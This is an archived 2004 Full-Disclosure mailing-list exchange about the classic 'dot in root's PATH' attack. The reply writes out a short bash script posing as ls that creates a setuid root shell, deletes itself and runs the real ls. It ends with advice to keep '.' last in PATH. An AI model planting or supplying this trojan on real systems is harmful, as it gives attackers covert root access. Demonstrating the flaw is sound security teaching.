[Full-Disclosure] Old LS Trojan?
Andrew Farmer
andfarm at teknovis.com
Wed Dec 1 22:27:40 GMT 2004
On 01 Dec 2004, at 12:11, David S. Morgan wrote:
> I am looking for an old LS trojan, with trojan being a misnomer.
> Essentially, the scinario is that the admin (root) has a . (dot) in
> his path. The bad-user knows this, and has crafted an LS shell script
> (the part that I can't find) that essentially copies /sbin/sh to a
> hidden directory and then performs some suid majik to make the sh run
> as if they were root, without needing the root password. The file
> then removes itself and does the real version of ls.
>
> Does anyone remember this one, and have the ls script anywhere? I
> would like to use it in a demonstration. I know that this has
> probobly been fixed in various ways, but I have "old Unixes" for just
> such occasions.
Probably something along the lines of:
> #!/bin/bash
> [ `whoami` = root ] || exit
> cp /bin/sh /bin/suid-sh
> chmod +s /bin/suid-sh
> rm $0
> exec /bin/ls $*
Note that this would only run if your $PATH _begins_ with '.' - if
you're going to put '.' in your $PATH, put it _last_.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: PGP.sig
Type: application/pgp-signature
Size: 186 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20041201/0af29ff0/attachment.bin
Full-Disclosure is hosted and sponsored by Secunia.